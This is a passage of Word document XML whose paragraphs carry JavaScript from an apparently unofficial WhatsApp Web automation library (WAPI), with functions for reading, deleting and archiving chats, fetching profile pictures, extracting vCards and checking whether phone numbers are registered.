        </w:rPr>
        <w:t xml:space="preserve">                    let messageObj = messages[i];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    if (n &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        if (!messageObj.isSentByMe) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            let message = WAPI.processMessageObj(messageObj, includeMe, includeNotifications);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            messageGroup.messages.unshift(message);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            n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(n === -1) { // chat was marked as unread so will fetch last message as unread</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        if (!messageObj.isSentByMe) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            let message = WAPI.processMessageObj(messageObj, includeMe, includeNotifications);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                            messageGroup.messages.unshift(message);</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 // unreadCount = 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        break;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if (messageGroup.messages.length &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    messageGroupObj.unreadCount = 0; // reset unread counter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    output.push(messageGroup);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window.WAPI.getGroupOwnerID = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const output = (await WAPI.getGroupMetadata(id)).owner.id;</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window.WAPI.getCommonGroups = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let output =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groups = window.WAPI.getAllGroups();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for (let idx in groups)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participants = await window.WAPI.getGroupParticipantIDs(groups[idx].id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (participants.filter((participant) =&gt; participant == id).length) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                output.push(groups[idx]);</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catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log("Error in group:");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log(groups[idx]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            console.log(err);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output;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window.WAPI.getProfilePicFromServer = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Store.WapQuery.profilePicFind(id).then(x =&gt; x.eurl);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window.WAPI.getProfilePicSmallFromId = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await window.Store.ProfilePicThumb.find(id).then(async d =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (d.img !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return await window.WAPI.downloadFileWithCredentials(d.img);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 (e)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window.WAPI.getProfilePicFromId = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await window.Store.ProfilePicThumb.find(id).then(async d =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (d.imgFull !== undefined) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return await window.WAPI.downloadFileWithCredentials(d.imgFull);</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function (e)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window.WAPI.downloadFileWithCredentials = async function (url) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!axios || !url) return false;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const ab = (await axios.get(url, { responseType: 'arraybuffer' })).data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return btoa(new Uint8Array(ab).reduce((data, byte) =&gt; data + String.fromCharCode(byte),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window.WAPI.downloadFile = async function (url) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await new Promise((resolve, reject) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        let xhr = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        xhr.onload = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (xhr.readyState == 4) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (xhr.status == 200) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    let reader = new FileReader();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    reader.readAsDataURL(xhr.response);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    reader.onload = function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                        resolve(reader.result.substr(reader.result.indexOf(',') + 1))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console.error(xhr.statusText);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console.log(err);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                resolve(false);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xhr.open("GET", url, true);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        xhr.responseType = 'blob';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        xhr.send(null);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window.WAPI.getBatteryLevel = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 'DEPRECATED'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window.WAPI.getIsPlugged = function () {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return 'DEPRECATED'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window.WAPI.deleteConversation = async function (chatId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let userId = new window.Store.UserConstructor(chatId, { intentionallyUsePrivateConstructor: true });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let conversation = WAPI.getChat(userId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!conversation)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window.Store.sendDelete(conversation, false).then(() =&gt;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}).catch(() =&gt;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window.WAPI.smartDeleteMessages = async function (chatId, messageArray, onlyLocal) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var userId = new Store.WidFactory.createWid(chatId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let conversation = WAPI.getChat(userId);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (!conversation)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(!Array.isArray(messageArray)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        messageArray = [messageArray];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messagesToDelete = messageArray.map(msgId =&gt; (typeof msgId == 'string') ? window.Store.Msg.get(msgId) : msgId).filter(x =&gt; x);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (messagesToDelete.length == 0) return true;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let jobs = onlyLocal ? [conversation.sendDeleteMsgs(messagesToDelete, conversation)] : [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        conversation.sendRevokeMsgs(messagesToDelete.filter(msg =&gt; msg.isSentByMe), conversation),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        conversation.sendDeleteMsgs(messagesToDelete.filter(msg =&gt; !msg.isSentByMe),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Promise.all(jobs).then(_ =&gt;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window.WAPI.deleteMessage = async function (chatId, messageArray, revoke = false) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let userId = new window.Store.UserConstructor(chatId, { intentionallyUsePrivateConstructor: true });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    let conversation = WAPI.getChat(userId);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(!conversation) return false;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(!Array.isArray(messageArray)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        messageArray = [messageArray];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let messagesToDelete = messageArray.map(msgId =&gt; window.Store.Msg.get(msgId));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(revoke) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        conversation.sendRevokeMsgs(messagesToDelete, conversation);</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conversation.sendDeleteMsgs(messagesToDelete, conversation);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window.WAPI.clearChat = async function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.ChatUtil.sendClear(Store.Chat.get(id),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@param id The id of the conversation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param archive boolean true =&gt; archive, false =&gt; unarchive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @return boolean true: worked, false: didnt work (probably already in desired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window.WAPI.archiveChat = async function (id, archive) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return await Store.Archive.setArchive(Store.Chat.get(id), archive).then(_ =&gt; true).catch(_ =&gt;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Extracts vcards from a message</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @param id string id of the message to extract the vcards from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @returns [vcard]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displayName:"Contact name",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> * vcard: "loong vcard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or false if no valid vcards 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window.WAPI.getVCards = function (id) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    var msg = Store.Msg.get(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (msg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (msg.type == 'vcard')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displayName: msg.subtype,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                    vcard: msg.body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else if (msg.type == 'multi_vcard') {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            return msg.vcardList</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        } else return false;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window.WAPI.checkNumberStatus = async function (id)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result = await window.Store.WapQuery.queryExist(id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (result.jid === undefined) throw 404;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const data = window.WAPI._serializeNumberStatusObj(result);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (data.status == 200) data.numberExists = true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return data;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    } catch (e) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return window.WAPI._serializeNumberStatusObj({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            status: e,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            jid: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window.WAPI.onAnyMessage = callback =&gt; window.Store.Msg.on('add', (newMessage) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (newMessage &amp;&amp; newMessage.isNewMsg) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (!newMessage.clientUrl &amp;&amp; (newMessage.mediaKeyTimestamp || newMessage.filehash)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
